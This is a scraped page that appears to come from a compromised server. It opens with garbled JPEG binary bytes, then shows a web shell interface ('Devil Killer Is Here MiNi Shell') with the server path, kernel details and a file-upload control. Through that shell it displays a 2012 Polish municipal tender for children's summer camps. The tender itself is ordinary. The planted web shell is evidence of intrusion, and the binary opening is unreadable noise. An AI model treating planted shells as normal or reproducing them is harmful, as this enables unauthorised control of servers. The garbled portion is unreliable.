JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120425/132916-N-2012.html

<p class="kh_header"><b>Warszawa: ZORGANIZOWANIE  KOLONI LETNICH Z PROGRAMEM  PROFILAKTYCZNYM ORAZ PROGRAMEM SPORTOWO - REKREACYJNYM</b><br>
<b>Numer ogłoszenia: 132916 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Stołecznego Warszawy dla Dzielnicy Wesoła , ul. 1 Praskiego Pułku 33, 05-075 Warszawa, woj. mazowieckie, tel. 22 773-60-27, faks 22 773-60-99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wesola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE  KOLONI LETNICH Z PROGRAMEM  PROFILAKTYCZNYM ORAZ PROGRAMEM SPORTOWO - REKREACYJNYM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi polegającej na zorganizowaniu dwóch turnusów kolonii letnich z programem profilaktycznym oraz programem sportowo - rekreacyjnym dla łącznie 90 dzieci. 

Uczestnikami kolonii letnich będzie 90 osobowa grupa dzieci w wieku 7 - 14 lat pochodzących 
z rodzin dysfunkcyjnych wytypowanych przez Zamawiającego, w dwóch turnusach  14 dniowych, gdzie 1 dzień będzie dniem przyjazdu, a ostatni 14 dzień, dniem wyjazdu. Maksymalny odstęp  czasowy pomiędzy organizacją I i II turnusu wynosi 2 dni. Zamawiający zastrzega sobie możliwość zmniejszenia liczby dzieci uczestniczących w koloniach - (minimalna liczba dzieci jadących na kolonie  to 75 dzieci). Ustalenie liczby uczestników koloni w poszczególnych turnusach nastąpi w terminie późniejszym. 
 
Opis zadania:
Zadanie:
1.	Turnus profilaktyczny trwający 14 dni (12 pełnych noclegów), w tym pierwszy i ostatni dzień są dniami przyjazdu i wyjazdu dzieci.
2.	Wyjazd i przyjazd dzieci może obejmować dni wolne od pracy tj. soboty i niedziele.
3.	Wykonawca nie może pobierać żadnych opłat od uczestników kolonii.
Termin:
4.	Termin realizacji zadania:   dwa 14 dniowe  turnusy w przedziale: od  01.07 - do 12.08.2012 roku.
Miejsce:
5.	Miejscem realizacji turnusu muszą być miejscowości na terenie Polski, atrakcyjne pod względem turystycznym z dostępem do zbiornika wodnego (jezioro, zalew, rzeka, morze itp.)                            z wyznaczonym kąpieliskiem i możliwością kąpania lub położone na obszarach górskich.
Kwalifikacja obiektu:
6.	Obiekt oraz teren, w którym ma być zorganizowany wypoczynek, musi spełniać wymogi określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej,           a także zasad jego organizowania i nadzorowania ( Dz. U. z 1997 r. Nr 12, poz.67 z późn. zm.) oraz wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych określonych przepisami o ochronie przeciwpożarowej (Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 r. w sprawie ochrony przeciwpożarowej budynków Dz. U. z 2006 r Nr 80, poz. 536), Państwowej Inspekcji Sanitarnej (ustawa z dnia 14 marca 1985 r. o Państwowej Inspekcji Sanitarnej - Dz. U. z 2006r. Nr 122, poz. 851 z późn. zm.). i ochronie środowiska. Ponadto obiekt  przeznaczony na wypoczynek dzieci i młodzieży musi zgodnie z § 45-47 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, spełniać warunki jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75, poz. 690 z późn. zm.)
7.	 Przed podpisaniem umowy Zamawiający zastrzega sobie prawo do wizji lokalnej
zaproponowanego miejsca realizacji turnusu (obiektu, terenu).
Obiekt i zakwaterowanie:
8.	Zamawiający wymaga, by dzieci wraz z kadrą zakwaterowane zostały w jednym lub dwóch
budynkach murowanych o tym samym standardzie, znajdujących się na terenie ogrodzonym
oświetlonym, stale strzeżonym.
9.	Obiekt powinien posiadać własną stołówkę z kuchnią, oddzielną salę umożliwiającą
prowadzenie zajęć profilaktycznych dla dzieci wyposażoną w niezbędny sprzęt i meble.
10. Na terenie obiektu powinno znajdować się boisko umożliwiające realizację programu
sportowo-rekreacyjnego oraz wyposażone w sprzęt sportowo-rekreacyjny niezbędny do
realizacji zajęć sportowo-rekreacyjnych, a także świetlica wyposażona w niezbędny sprzęt i meble
oraz dostępny odbiornik TV.
11.	W wyposażeniu obiektu Wykonawca powinien zapewnić także sprawny sprzęt audio-wideo (TV, DVD, audio) materiały do zajęć plastycznych i zajęć prowadzonych przez psychologa                 w ilościach zabezpieczających potrzeby wszystkich uczestników oraz organizację imprez i czasu wolnego zgodnie z programem rekreacyjno-sportowym.
12.	Zakwaterowanie w pokojach maksymalnie 6 osobowych w obiekcie murowanym takim jak ośrodek wypoczynkowy, dom wczasowy, pensjonat, internat lub samodzielny ośrodek kolonijny;    (w rozumieniu przepisów ustawy Prawo budowlane) - z wyłączeniem samodzielnych domków lub pawilonów.
13.	Zamawiający wymaga, aby pokoje wyposażone były w: pełnowymiarowe łóżka bez nadstawek   (w pokojach nie mogą znajdować się łóżka piętrowe). Pokoje dzieci powinny być wyposażone w: szafy ubraniowe z wieszakami, stolik i krzesła oraz szafki osobiste przy łóżkach (adekwatnie do ilości osób zakwaterowanych).
14.	Węzły sanitarne (natryski, WC, umywalka) w pokojach lub w odrębnym pomieszczeniu na korytarzach ( w bezpośrednim sąsiedztwie pokoi - jedna łazienka przewidziana na nie więcej niż 6 osób). Woda ciepła bez ograniczeń.
15.	Wykonawca jest obowiązany zapewnić uczestnikom wypoczynku bezpieczne i higieniczne warunki w czasie wypoczynku - umożliwić dzieciom także korzystanie z pralki oraz suszarni odzieży.
16.	Zamawiający wymaga, by dzieci zakwaterowane zostały na tym samym piętrze razem                  z wychowawcami.
17.	Wykonawca kolonii zapewni możliwość korzystania z kąpieliska spełniającego wymogi bezpieczeństwa i czystości wody (pozytywna opinia Sanepidu) oraz zatrudni ratowników na cały okres turnusu, mających potwierdzone uprawnienia w liczbie dostosowanej do liczby dzieci             (w przypadku organizacji wypoczynku nad zbiornikiem wodnym).
Transport:
18.	Wykonawca turnusu zapewni transport sprawnym autokarem dla dzieci (do miejsca wypoczynku, powrotu do Warszawy oraz w czasie trwania wypoczynku).
19.	Autokary powinny posiadać ważne badania techniczne oraz powinny spełniać warunki  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. 2003 r. Nr 32, poz. 262 z późn. zm.).
20.	Koszt transportu należy wliczyć w cenę jednostkową organizowanego wypoczynku.
21.	W przypadku wystąpienia niesprawności podstawionego przez Wykonawcę taboru
zobowiązany on jest do zapewnienia na koszt własny zastępczego alternatywnego środka
transportu dla uczestników kolonii o tym samym standardzie, a także do zapewnienia i pokrycia
kosztów opieki i wyżywienia dla uczestników kolonii w czasie oczekiwania na transport.
22.	Wykonawca zapewni opiekę wychowawców w czasie przewozu uczestników turnusu - na
i z turnusu oraz w czasie organizowanych wycieczek stosownie do liczby uczestników.
Ubezpieczenie:
23.	Wykonawca turnusu zapewni ubezpieczenie dzieci w czasie transportu i pobytu na turnus
(NNW). Koszt ubezpieczenia należy wliczyć w cenę jednostkową organizowanego wypoczynku.
24.	Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez
uczestników kolonii i jest zobowiązany do posiadania ubezpieczenia OC.
25.	Wykonawca dostarczy przed podpisaniem umowy polisę lub inny dokument potwierdzający
że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000, -zł
obejmującej okres świadczenia usługi.
Wyżywienie:
26.	Wyżywienie codzienne - 4 posiłki dziennie (śniadanie, obiad, podwieczorek, kolację)
przygotowane zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi                             w obowiązujących przepisach prawa.
27.	Wykonawca turnusu zapewni dzieciom na terenie obiektu - w stołówce, przez cały dzień
dostęp do nieodpłatnych napojów w ilości dostosowanej do zapotrzebowania dzieci.
28.	Dodatkowo Wykonawca zapewni dzieciom dostęp do nieodpłatnych napojów w ilości
dostosowanej do potrzeb podczas organizowanych w czasie trwania turnusu wycieczek.
Rezydent:
29.	Wykonawca przez cały okres turnusu zobowiązuje się do zapewnienia bezpłatnego
  zakwaterowania i całodziennego wyżywienia dla rezydenta ze strony Zamawiającego
  Zamawiający nie dopuszcza możliwości pełnienia przez rezydenta jednocześnie funkcji
  wychowawcy
Kadra:
30.	W czasie realizacji kolonii Wykonawca musi dysponować następującymi osobami;
1)	kierownik turnusu,
2)	wychowawcy, w tym także osoby realizujące program sportowo- rekreacyjny,
3)	ratownik - w przypadku gdy turnus organizowany jest w miejscu z dostępem do zbiornika wodnego,
4)	realizator programu profilaktycznego,
5)	pielęgniarz (pielęgniarka),
6)	psycholog, który może być jednocześnie realizatorem programu profilaktycznego.
Zamawiający nie dopuszcza zmiany kadry, która podjęła pracę z dziećmi bez wcześniejszego uzgodnienia tego faktu z Zamawiającym.
Opieka medyczna:
31. Wykonawca turnusu zapewni dzieciom opiekę medyczną:
- zatrudni pielęgniarkę posiadającą ważne zaświadczenie potwierdzające prawo do wykonywania zawodu (zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej Dz. U. z 1992 r. Nr 52, poz. 248)   z dyspozycyjnością 24h na dobę w miejscu zakwaterowania dzieci, 
-    zapewni stały dostęp do opieki lekarskiej w ramach ubezpieczenia zdrowotnego.
Zamawiający nie dopuszcza możliwości, aby pielęgniarka pełniła jednocześnie funkcję
wychowawcy.
32.	Wykonawca zapewni izolatkę dla uczestników kolonii chorujących w trakcie jej trwania oraz poniesie niezbędne koszty ich leczenia nie objęte ubezpieczeniem.
33.	Wykonawca zaopatrzy ambulatorium i apteczkę kolonijną w podstawowe leki i środki opatrunkowe, umożliwiające udzielenie w razie konieczności pierwszej pomocy przedlekarskiej,        a także zapewni leczenie zgodnie ze wskazaniami lekarskimi w przypadku zachorowań uczestników kolonii.
Program sportowo- rekreacyjny:
34.	Celem programu jest przekazanie dzieciom i młodzieży wiedzy na temat aktywnych
bezpiecznych i zdrowych form spędzania czasu wolnego w formie atrakcyjnych zabaw, gier
sportowych, wycieczek rozwijających ich zainteresowania oraz umiejętności współpracy w grupie.
35. Zamawiający wymaga złożenia programu i harmonogramu realizacji zadań dotyczących zajęć sportowo-rekreacyjnych.
Program powinien być realizowany na bezpiecznym terenie.
W przypadku gier terenowych wymagana jest podczas realizacji zajęć obecność wszystkich wychowawców oraz pielęgniarki.
Program sportowo-rekreacyjny powinien obejmować:
-  min. 5 godzin w ciągu dnia aktywnych i zorganizowanych form spędzania czasu na świeżym powietrzu oraz w świetlicy: gry i zabawy, zajęcia plastyczne i muzyczne
dyskoteki, turnieje sportowe, zabawy terenowe ,itp.
- organizację minimum 2 całodniowych wycieczek autokarowych do atrakcyjnych poznawczo miejsc, regionów uwzględniających także wstęp do obiektów muzealnych (wraz z opieką wychowawców).
Program profilaktyczny:
36.	Program realizowany przez osoby posiadającymi kwalifikacje do prowadzenia programów
profilaktycznych oraz doświadczenie w realizacji ww programów. W trakcie trwania spotkań
należy zadbać o poczucie bezpieczeństwa każdego z członków grupy, by miał on możliwość
nabyć   podstawowe   umiejętności   samodzielnego,   niezależnego   oceniania   sytuacji
konstruktywnego wyrażania własnych opinii.
Program powinien być tak przygotowany, aby był dostosowany do wieku rozwojowego psychospołecznego uczestników prowadzony w grupach nie większych niż 16 osób.
Program profilaktyczny powinien obejmować od 12 do 16 godzin dydaktycznych zajęć dla każdej 
z grup w turnusie.
Cele programu profilaktycznego to kształtowanie umiejętności społecznych oraz poznanie mechanizmów uzależnień. Ze szczególnym uwzględnieniem następujących treści:
- umiejętność pracy w grupie:
- rozpoznawanie i wyrażanie własnych  uczuć oraz radzenie sobie z tzw. trudnymi emocjami,  tj. napięciem, złością strachem, wstydem itp.;
- budowanie postawy wytrwałości i wytrzymałości;
- doskonalenie umiejętności komunikacji, w tym umiejętności słuchania;
- profilaktyka uzależnień;
37.	W realizacji powyższych zadań należy wykorzystać różnorodne formy i metody pracy.
38.	Wykonawca zapewnia materiały dydaktyczne niezbędne do realizacji programu
profilaktycznego min. papier, kredki, inne materiały do prowadzenia ćwiczeń.
39. Po zakończeniu turnusu Zamawiający powinien otrzymać, sprawozdanie merytoryczne                  z realizacji przedmiotu zamówienia wraz z wynikami ankiet ewaluacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przedłożą aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 
pkt 2 ustawy, wystawionego nie wcześniej niż 6. miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy. W przypadku podmiotów występujących wspólnie, dokument ten składają wszyscy Wykonawcy,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych wg wzoru określonego w załączniku nr 3 w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jednej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. zorganizowanie  turnusu kolonii profilaktycznych z programem  profilaktycznym  oraz programem sportowo - rekreacyjnym  o wartości nie mniejszej niż 60.000,- zł (brutto) - z podaniem  wartości, daty wykonania - z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.  W przypadku podmiotów występujących wspólnie, dokument ten składają Ci Wykonawcy (lub Wykonawca), którzy spełniają warunek udziału w postępowaniu,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób wg wzoru określonego w załączniku nr 2, które będą uczestniczyć w wykonywaniu zamówienia. Zamawiający wymaga  dysponowania min:      
       - kierownik turnusu (1 osoba) posiadająca doświadczenie w pełnieniu funkcji kierownika turnusu (kolonii) co najmniej 3 krotnie na podobnych turnusach w okresie ostatnich trzech lat oraz posiadającego zaświadczenie o ukończeniu kursu dla kierowników wypoczynku obejmującego program stanowiący załącznik nr 4 do rozporządzenia Min. Edukacji Narodowej    z dnia 21 stycznia1997 r. w sprawie warunków, jakie muszą spełnia organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania nadzorowania (Dz. U. z 1997 r. Nr 12, poz. 67 z późn. zm.).
       - wychowawcy (minimum 4 osoby) - Wykonawca zatrudni 1 wychowawcę na nie więcej 
niż 11 uczestników turnusu. Wychowawcy muszą posiadać minimum średnie wykształcenie oraz doświadczenie w pracy opiekuńczo-wychowawczej lub dydaktyczno wychowawczej - co najmniej 3 krotne uczestnictwo na podobnych turnusach w charakterze wychowawcy w okresie ostatnich trzech lat - zgodnie z rozporządzeniem Min. Edukacji Narodowej z dnia 2 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. Nr 1S poz. 67 z późn. zm.). Ze względu na profilaktyczny charakter turnusu Zamawiający zaleca, aby wychowawcy posiadali wyższe wykształcenie kierunkowe. 
        - pedagoga (psychologa) lub instruktora terapii uzależnień (minimum 1 osoba)- osoba ta musi posiadać ukończone studia wyższe kierunkowe oraz posiadać udokumentowane przynajmniej dwuletnie doświadczenie w pracy z dziećmi i młodzieżą oraz doświadczenie z zakresu profilaktyki uzależnień .
        - pielęgniarz/pielęgniarka (minimum 1 osoba) - posiadającą ważne zaświadczenie               potwierdzające prawo do wykonywania zawodu - zgodnie z rozporządzeniem Min. Zdrowia  i Opieki Społecznej (Dz. U. z 1992 r. Nr 52, poz. 248) z dyspozycyjnością 24h na dobę w sprawowaniu opieki pielęgniarskiej,
        - ratownika - (minimum 1 osoba) osoba posiadająca kurs pozwalający na pełnienie funkcji ratownika wodnego (w przypadku organizacji wypoczynku nad zbiornikiem wodnym).
W przypadku podmiotów występujących wspólnie, dokument ten składają Ci Wykonawcy (lub Wykonawca), którzy spełniają warunek udziału w postępowaniu,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Atrakcyjność terenu, standard ośrodka i baza techniczno-organizacyjna - 25</li>
<li>3 - Program zajęć i kadra wychowawcza - 25</li>
</ul>
